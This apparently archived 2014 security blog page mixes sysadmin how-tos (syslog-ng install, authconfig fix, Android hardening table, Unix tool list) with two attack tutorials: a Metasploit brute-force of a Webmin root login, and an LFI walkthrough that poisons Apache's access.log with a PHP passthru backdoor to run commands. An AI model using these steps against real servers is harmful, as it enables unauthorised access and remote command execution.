Mar 14, 2014

Howto: Brute force webmin with Metasploit

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt

PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
 
 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Pwning website with Local File Inclusion(LFI) English version

From the news that subdomain of yahoo.com has LFI vulnerability, this post will explain the last example of the news.
By Sumedt Jitpukdeobidn, Senior Security Researcher@I-Secure(www.i-secure.co.th)

1. First of all we know that the target website has LFI vulnerability
- http://<target_domain>/include.php?file=poc.php
- http://<target_domain>/include.php?file=../../../../../../../etc/passwd
2. We can view source code of include.php to finding parameter of page with
http://<target_domain>/include.php?file=php://filter/convert.base64-encode/resource=include.php. After review source code,we found that include.php has id parameter.

3. We will use $id for our command parameter in backdoor code that we inject into access.log.

4.  <?php passthru($id) ?> was inject into access.log
 

5. Try to execute command via LFI and id parameter with http://localhost/include.php?id=whereis nc&file=../../../../../../var/log/apache2/access.log

*** By the way, if you don't want to use parameter of include.php, you can generate your own parameter with 
GET /<?php passthru($_GET['command']); ?>
And when request backdoor use this example request. http://localhost/include.php?file=/var/log/apache2/access.log&command=pwd

Credit: https://twitter.com/ptantiku

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Pwning website with Local File Inclusion(LFI)

จากข่าวของการพบช่องโหว่ LFI ของ Yahoo.com บางคนสงสัยว่าไอ้ช่วงสุดท้ายของบทความ มันหมายความว่าไงแล้วมันทำได้จริงหรือไม่ เลยเขียนบทความนี้เพื่ออธิบายครับ ผมสมมติแบบนี้ละกันครับ

โดย นายสุเมธ จิตภักดีบดินทร์, Senior Security Researcher@I-Secure(www.i-secure.co.th)

1. พบช่องโหว่ LFI ที่ 
- http://<target_domain>/include.php?file=poc.php
- http://<target_domain>/include.php?file=../../../../../../../etc/passwd
2.  ตรวจสอบดู source code ของ include.php ว่ามีตัวแปรใดบ้าง โดยใช้คำสั่งเป็น http://<target_domain>/include.php?file=php://filter/convert.base64-encode/resource=<filename.php> ที่นี้เพราะว่าเราพยายามให้ file ที่ include เข้ามาใช้ตัวแปรร่วมกับไฟล์ include.php ครับ

3. หลังจากการตรวจสอบ พบว่าเจอว่ามีตัวแปร id อยู่ จึงได้สร้าง backdoor โดยส่ง request ไปเป็น
*** ข้อ 3 ทำไมถึงไม่เหมือนกับที่ยกตัวอย่างในข่าว เพราะ include function ไม่สามารถใช้งานเป็น http://<target_name>/include.php?file=../../../../../../var/log/apache2/access.log?v=pwd ได้ครับ เนื่องด้วย include จะเปิดไฟล์ "../../../../../../var/log/apache2/access.log?v=pwd" ไม่ใช่การเปิดไฟล์ "../../../../../../var/log/apache2/access.log" ครับ ดังนั้นเราจึงต้องไปใช้งานตัวแปรร่วมกับ include.php ครับ

4.  สิ่งที่เกิดขึ้นคือ Apache จะนำ request ดังกล่าวที่เป็น code php เก็บเข้าไปใน access log(log การเข้าถึง website) ด้วย นั่นหมายความว่าใน Access.log จะมี code php ที่เป็น backdoor ของ Hacker ฝังอยู่นั่นเอง
รูปภาพตัวอย่าง Access.log ที่มี code php ฝังอยู่
 

5. จากนั้น Hacker จึงสั่งงาน backdoor นั้น โดย include /var/log/apache2 เข้ามาใช้งานนั่นเองครับ

*** หมายเหตุ หากเราไม่ต้องการใช้งานตัวแปรของ include.php เราสามารถสร้าง backdoor ได้โดยใช้เป็น
GET /<?php passthru($_GET['command']); ?>
แล้วเวลาเรียก backdoor ใช้เป็น http://localhost/include.php?file=/var/log/apache2/access.log&command=pwd

Credit: https://twitter.com/ptantiku


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 13, 2014

Howto: Fix Authconfig command error with "locale.Error: unsupported locale setting"

Traceback (most recent call last):
  File "/usr/sbin/authconfig", line 32, in <module>
    locale.setlocale(locale.LC_ALL, '')
  File "/usr/lib64/python2.6/locale.py", line 513, in setlocale
    return _setlocale(category, locale)
locale.Error: unsupported locale setting



1. Fix it with modify line 32 of /usr/sbin/authconfig 

2. Change from locale.setlocale(locale.LC_ALL, '') to locale.setlocale(locale.LC_ALL, None)

3. Try to run it again. (authconfig --test | grep hashing | grep sha512)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: ติดตั้ง Syslog-ng บน CentOS 6.5

ติดตั้ง syslog-ng
-    ติดตั้ง require package
o    yum install gcc zlib-devel libffi-devel
-    ติดตั้ง glib
o    cd /tmp
o    wget ftp://ftp.gtk.org/pub/glib/2.34/glib-2.34.0.tar.xz
o    tar xvf glib-2.34.0.tar.xz
o    cd glib-2.34.0
o    ./configure && make && make install
-    ติดตั้ง eventlog
o    wget http://www.balabit.com/downloads/files/syslog-ng/sources/3.5.3/source/eventlog_0.2.12+20120504+1700.tar.gz
o    tar xzvf eventlog_0.2.12+20120504+1700.tar.gz
o    cd eventlog_0.2.12+20120504+1700.tar.gz
o    ./configure && make && make install
-    ติดตั้ง libol
o    wget http://www.balabit.com/downloads/files/libol/0.3/libol-0.3.9.tar.gz
o    tar xzvf libol-0.3.9.tar.gz
o    cd libol-0.3.9
o    ./configure && make && make install
-    ติดตั้ง syslog-ng
o    wget http://www.balabit.com/downloads/files/syslog-ng/sources/3.5.3/source/syslog-ng_3.5.3.tar.gz
o    export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/include/:/usr/local/lib64/:/usr/local/lib/pkgconfig/:/usr/local/lib/
o    tar xzvf syslog-ng_3.5.3.tar.gz
o    cd syslog-ng-3.5.3
o    ./configure --sysconfdir=/etc/syslog-ng --prefix=/usr/local/syslog-ng
o    make && make install
o    cp /usr/local/etc/syslog-ng.conf /etc/syslog-ng.conf
o    สร้างไฟล์ /etc/init.d/syslog-ng โดยภายในเขียนเป็นดังนี้
   #!/bin/bash
 #chkconfig: --add syslog-ng
 #chkconfig: 2345 12 88
 #Description: syslog-ng

 # Full path to daemon
 INIT_PROG="/usr/local/syslog-ng/sbin/syslog-ng"  
 # options passed to daemon
 INIT_OPTS="-f /etc/syslog-ng/syslog-ng.conf"                    

 PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/syslog-ng/bin:/usr/local/syslog-ng/sbin

 INIT_NAME=`basename "$INIT_PROG"`

 # Source Redhat function library.
 #
 . /etc/rc.d/init.d/functions

 # Uncomment this if you are on Redhat and think this is useful
 #
 #. /etc/sysconfig/network
 #
 #if [ ${NETWORKING} = "no" ]
 #then
 #       exit 0
 #fi

 RETVAL=0

 umask 077
 ulimit -c 0

 # See how we were called.
 case "$1" in
   start)
 echo -n "Starting $INIT_NAME: "
 daemon --check $INIT_PROG "$INIT_PROG $INIT_OPTS"
 RETVAL=$?
 echo -n "Starting Kernel Logger: "
 [ -x "/sbin/klogd" ] && daemon klogd
 echo
 [ $RETVAL -eq 0 ] && touch "/var/lock/subsys/${INIT_NAME}"
 ;;
   stop)
 echo -n "Stopping $INIT_NAME: "
 killproc $INIT_PROG
 RETVAL=$?
 echo -n "Stopping Kernel Logger: "
 [ -x "/sbin/klogd" ] && killproc klogd
 echo
 [ $RETVAL -eq 0 ] && rm -f "/var/lock/subsys/${INIT_NAME}"
 ;;
   status)
 status $INIT_PROG
 RETVAL=$?
 ;;
   restart|reload)
 $0 stop
 $0 start
 RETVAL=$?
 ;;
   *)
 echo "Usage: $0 {start|stop|status|restart|reload}"
 exit 1
 esac
 exit $RETVAL
o    กำหนดสิทธิ์ให้กับไฟล์ /etc/init.d/syslog-ng โดยใช้คำสั่ง
chmod +x /etc/init.d/syslog-ng
o    ทดสอบใช้งาน script
/etc/init.d/syslog-ng start



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 12, 2014

Android Security Enhancements

Android Version
Security Enhancement
Details
Reference / Bypass (if applicable)
4.4dm-veritytransparent integrity checking of block devices. dm-verity helps prevent persistent rootkits that can hold onto root privileges and compromise devices.
4.4SE_Linux => Enforced Modeall root domain binaries are working in enforced mode. remaining still work in permissive modeSE Linux Details
4.4FORTIFY_SOURCELevel 2 : full source code compiled with FORTIFY_SOURCE and clang support added.
4.4SSL CA Certificate WarningsWarns when any certificate is added to the device certificate storeBypass available already
4.3Restrict Setuid from Android AppsNo Zygote spanned process is allowed to execute setuid program. /system is mounted with nosetuid
Bypassed by Chainfire
4.3FORTIFY_SOURCEAndroid x86 and MIPS and fortified strchr(), strrchr(), strlen(), and umask() calls
4.3SE_Linux => Permissiveallows logging but doesn't restrict actions

4.3Trusted Platform Module (TPM) supportHardware backed storage for KeyChain making keys unavailable for extraction
4.2.2ADB AuthenticationPrevents unauthorised use of ADB by the use of RSA keypair for authentication
Android 4.3 Security Enhancement Announcement
4.2FORTIFY_SOURCELevel 1 : This is used by system libraries and applications to prevent memory corruption
4.2Application verificationuser can opt for client side bouncer instance and google can verify malacious applications before installation.
4.2Certificate Pinningif chain of certs doesn't match an error message is added.
4.2installd configinstalld runs as non root from start.
4.2ContentProvider securityby default contentprovider will be set to false for API <=17
4.2init configO_NOFOLLOW added to init to avoid symbolic link attacks.
4.2premium SMS notificationSMS to premium numbers now display a notification and only allow needing when explicitely accepted.
4.2SecureRandom implementationSecureRandom implementation based on OpenSSL, Bounty castle implementation removed.details here
4.2JavascriptInterface annotationJavascriptInterface needs to be annotated for webviewexploit possible for <4.2 devices. and applications using API < 17
Reference :
Metasploit Module
Test Page : identifies if browser or webview is vulnerable.
Additional Details
4.2CryptographySSLSocket support for TLSv1.1 and TLSv1.2 using OpenSSL 1.0.1
4.1PIE (Position Independent Executable) supportSupport for binaries compiled with GCC's -pie -fPIE flags
(executables to be position independent)

4.1Read-only relocations / immediate binding(-Wl,-z,relro -Wl,-z,now)
4.1kernel address leakage preventiondmesg_restrict and kptr_restrict enabledkptr_restrict mitigates Levitator Exploit
4.1ELF HardeningRELRO / BIND_NOW flag default. This hardens those binaries against attacks that may attempt to overwrite the GOT and other sensitive ELF structures by making them read-only at startup.breaks Gingerbreak Exploit
more details on RELRO here
4.1ASLR supportFull ASLR support
4.0.3Randomize Heap/brk mappingkernel.randomize_va_space is set to 2
4.0ASLR supportASLR support started appearing although not fully. Multiple flaws were present dynamic linker didn't had ASLR and many more outlined in reference linkASLR support review by duo security
3.0full filesystem encryptionFull disk encryption addedDetails on this archive link
2.3format string vulnerability protectionadded -Wformat-security -Werror=format-security
2.3code execution prevention on stack and heapHardware-based No eXecute (NX)
2.3null pointer dereference protectionmmap_min_addr
2.2Device AdministrationAndroid Device Administration API addedDevice Adminstration Guide
1.5Stack / buffer overrun protectionProPolice to prevent stack buffer overruns (-fstack-protector)Memory Management Enhancement : Old Archive link
1.5Integer overflow protectionsafe_iop
1.5Integer overflow memory allocationOpenBSD calloc
1.5chunk consolidation attackExtensions to OpenBSD dlmalloc() to prevent double free()


Source: http://androidtamer.com/android-security-enhancements/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: A little collection of cool unix terminal/console/curses tools

A little collection of cool unix terminal/console/curses tools
Just a list of 20 (now 28) tools for the command line. Some are little-known, some are just too useful to miss, some are pure obscure -- I hope you find something useful that you weren't aware of yet! Use your operating system's package manager to install most of them. (Thanks for the tips, everybody!)

dstat & sar

iostat, vmstat, ifstat and much more in one.

slurm

Visualizes network interface traffic over time.

vim & emacs

The real programmers' editors.

screen, dtach, tmux, byobu

Keep your terminal sessions alive.

multitail

See your log files in separate windows.

tpp

Presentation ("PowerPoint") tool for terminal.

xargs & parallel

Executes tasks from input (even multithread).

duplicity & rsyncrypto

Encrypting backup tools.

nethack & slash'em

Still the most complex game on the planet.

lftp

Does FTPS. Can mirror, kinda like rsync.

ack

A better grep for source code.

calcurse & remind + wyrd

Calendar systems.

newsbeuter & rsstail

Command line RSS readers.

powertop

Helps conserve power on Linux.

tig

A console UI for git.

qalc

The best calculator. Ever. (For scripts too.)

htop & iotop

Process, memory and io monitoring.

ttyrec & ipbt

Record and play back terminal sessions.

rsync

Keeps filesystems in sync over SSH.

mtr

traceroute 2.0.

socat & netpipes

Directing stuff easily in and out of sockets.

iftop, iptraf & nethogs

To see where your traffic goes.

siege & tsung

Command line load test tools.

ledger

Terminal-based accounting package.

taskwarrior

Todo management in the terminal.

curl

Everybody's favorite HTTP toolbox.

rtorrent & aria2

Command line torrent downloaders.

ttytter & earthquake

Nice trendy Twitter clients :)

vifm & ranger

Alternatives to the midnight commander.

cloc

Counts lines of code.

ipcalc

For network assignments.



Source: http://kkovacs.eu/cool-but-obscure-unix-tools


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |